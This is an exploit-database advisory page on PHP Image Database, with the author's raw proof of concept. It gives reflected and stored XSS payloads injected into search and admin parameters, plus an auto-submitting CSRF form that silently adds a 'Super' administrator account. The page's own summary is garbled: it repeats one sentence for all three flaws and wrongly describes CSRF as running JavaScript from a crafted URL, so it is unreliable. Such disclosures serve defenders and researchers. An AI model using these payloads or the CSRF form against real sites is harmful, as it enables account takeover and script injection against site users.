PHP Image Database - Multiple Vulnerabilities

vendor:

PHP Image Database

by:

larrycompress

8,8

CVSS

HIGH

Reflected XSS, Stored XSS, CSRF

79, 79, 352

CWE

Product Name: PHP Image Database

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: PHP

2016

PHP Image Database – Multiple Vulnerabilities

Multiple vulnerabilities exist in PHP Image Database, including Reflected XSS, Stored XSS, and CSRF. Reflected XSS can be exploited by sending a maliciously crafted URL to a victim, which will execute arbitrary JavaScript code when the URL is visited. Stored XSS can be exploited by sending a maliciously crafted URL to a victim, which will execute arbitrary JavaScript code when the URL is visited. CSRF can be exploited by sending a maliciously crafted URL to a victim, which will execute arbitrary JavaScript code when the URL is visited.

Mitigation:

Input validation should be used to prevent malicious code from being executed. Access control should be used to prevent unauthorized access to the application. Cross-site request forgery should be prevented by using a token-based approach.

Source

Exploit-DB raw data:

# Exploit Title: PHP Image Database - Multiple Vulnerabilities
# Date: 2016-10-16
# Exploit Author: larrycompress
# Contact: larrycompress@gmail.com
# Type: webapps
# Platform: PHP
# Vendor Homepage: http://www.pagereactions.com/product.php?pku=3
# Software Link: http://www.pagereactions.com/downloads/phpimagedatabase.zip
----------------------------------------------------------------------------

POC as follows :

# 0x00 Reflected XSS

---

1.In public search :

http://192.168.1.112/phpimagedatabase/index.php?dateyear=<svg/onload=alert(1)>&key=<svg/onload=alert(2)>

2.In administration web interface (need normal user login) :

http://192.168.1.112/phpimagedatabase/administration.php?dateyear=<svg/onload=alert(1)>&key=<svg/onload=alert(2)>


# 0x01 Stored XSS

---

1.In administration web images interface (need normal user login) :

http://192.168.1.112/phpimagedatabase/administration.php
?pageaction=newimage
&MAX_FILE_SIZE=1000000
&subaction=submit
&dateday=16
&datemonthnewedit=10
&dateyearnewedit=2016
&title=<svg/onload=alert(1)>
&caption=<svg/onload=alert(2)>
&keywordtags=<svg/onload=alert(3)>
&photographer=<svg/onload=alert(4)>
&categorynewedit=
&publish=active

2.In administration web categories interface (need  administrator user login) :

http://192.168.1.112/phpimagedatabase/administration.php?pageaction=newcategory&subaction=submit&categoryname=</select><svg/onload=alert(1)><select>

# 0x02 CSRF (add Super user)

---

In http://192.168.1.103/csrf.html :

<!DOCTYPE html>
<html>
  <body>
    <form action="http://192.168.1.112/phpimagedatabase/administration.php" method="POST">
      <input name="pageaction" value="saveuser" type="hidden" />
      <input name="subaction" value="submit" type="hidden" />
      <input name="username" value="larry_csrf" type="hidden" />
      <input name="password" value="larry_csrf" type="hidden" />
      <input name="userfullname" value="larry_csrf" type="hidden" />
      <input name="accesslevel" value="Super" type="hidden" />
      <input name="userstatus" value="active" type="hidden" />
      <input name="mysubmit" value="submit" type="submit" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

* Thanks to Besim *